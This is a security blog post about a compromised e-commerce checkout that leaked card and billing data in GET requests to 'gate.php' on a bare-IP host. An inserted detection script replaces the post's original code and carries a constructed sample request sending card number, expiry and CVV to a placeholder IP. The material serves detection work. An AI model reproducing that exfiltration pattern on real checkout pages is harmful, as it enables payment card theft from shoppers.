Beware Compromised Shopping Carts
I think many people have stumbled upon "less than secure" sites which claim to have a secure checkout. I can't even count how many times I've looked for some obscure item on the web and have come across a website which just seems a bit off.

Yesterday I received a Snort alert which I often see on a compromised host:

> ET TROJAN Likely Zbot Generic Post to gate.php Dotted-Quad

What I instantly noticed in the transcript is that this isn't the normal POST that I see from Zeus. What I had seen was a GET request with the user's credit card and billing information in the request header. See screenshot:

I've excluded the rest of the transcript, so as not to mention the site which is actually compromised at this time. However, I will say that it is very clear when looking at surrounding PCAPs from the source IP that the user was shopping for building supplies. When looking at the website's checkout page, I stumbled upon the following code:
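The pattern described above (a GET to `gate.php` on a bare IP host, carrying card and billing data in the request line or headers rather than in a POST body) is easy to triage from captured request headers. The following is an added detection example, not code from the original post: it parses a few constructed raw HTTP requests (the sample data is made up for the example; the only identifier taken from the post is the `gate.php` path), flags requests whose host is a dotted quad and whose path ends in `gate.php`, and separately flags GET requests whose request line or headers contain a Luhn-valid card-number-like digit run. Only the last four digits of any match are kept in the result, so the alert itself does not store the PAN.

```python
"""Added example: triage captured HTTP requests for the exfiltration pattern
described in the post. All sample requests below are constructed for this
example and are not the post's transcript."""
import re
from urllib.parse import urlsplit

# Constructed raw requests (request line + headers, CRLF-delimited).
SAMPLE_REQUESTS = [
    # A normal checkout POST to a named host: nothing suspicious.
    "POST /checkout/submit HTTP/1.1\r\nHost: shop.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n",
    # GET to gate.php on a bare IP, card data in the query plus a custom header.
    "GET /gate.php?cc=4111111111111111&exp=1227&cvv=123&name=J+Doe HTTP/1.1\r\n"
    "Host: 203.0.113.7\r\nX-Billing: 12 Main St\r\n\r\n",
    # GET to gate.php on a bare IP with no card data: matches the IDS pattern only.
    "GET /gate.php?id=42 HTTP/1.1\r\nHost: 198.51.100.9\r\n\r\n",
]

DOTTED_QUAD = re.compile(r"^\d{1,3}(\.\d{1,3}){3}(:\d+)?$")
# 13-19 digits, optionally separated by single spaces or hyphens, not embedded
# in a longer digit run (so timestamps or IP octets do not match).
CARD_CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){13,19}(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Standard Luhn check; filters out random digit runs that are not PAN-shaped."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_card_numbers(text: str) -> list:
    """Return every Luhn-valid 13-19 digit run found in text (separators removed)."""
    found = []
    for m in CARD_CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            found.append(digits)
    return found


def parse_request(raw: str):
    """Split a raw request into (method, target, lowercase header dict)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            k, v = line.split(":", 1)
            headers[k.strip().lower()] = v.strip()
    return method, target, headers


def classify(raw: str) -> dict:
    """Return a triage record: which indicators fired and masked PANs, if any."""
    method, target, headers = parse_request(raw)
    path = urlsplit(target).path
    host = headers.get("host", "")
    reasons = []
    if path.endswith("/gate.php") and DOTTED_QUAD.match(host):
        reasons.append("gate.php on dotted-quad host")
    # Look for card data in the request line and every header value.
    searchable = target + "\n" + "\n".join(f"{k}: {v}" for k, v in headers.items())
    cards = find_card_numbers(searchable)
    if cards and method == "GET":
        reasons.append("GET carrying Luhn-valid PAN")
    return {
        "method": method,
        "host": host,
        "path": path,
        "pans": [c[-4:] for c in cards],  # keep only the last four digits
        "reasons": reasons,
    }


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        rec = classify(raw)
        status = "ALERT" if rec["reasons"] else "ok   "
        print(f"{status} {rec['method']} {rec['host']}{rec['path']} {rec['reasons']} pans={rec['pans']}")
```

The two indicators are kept separate on purpose: the `gate.php` plus bare-IP check reproduces what the Snort signature keys on, while the PAN check is what distinguishes this request from the usual Zeus POST and tells you the checkout page itself has been tampered with. On a real capture, the third sample (gate.php with no card data) is the kind of hit you would still investigate, since the same host may receive POSTs the GET-only check ignores.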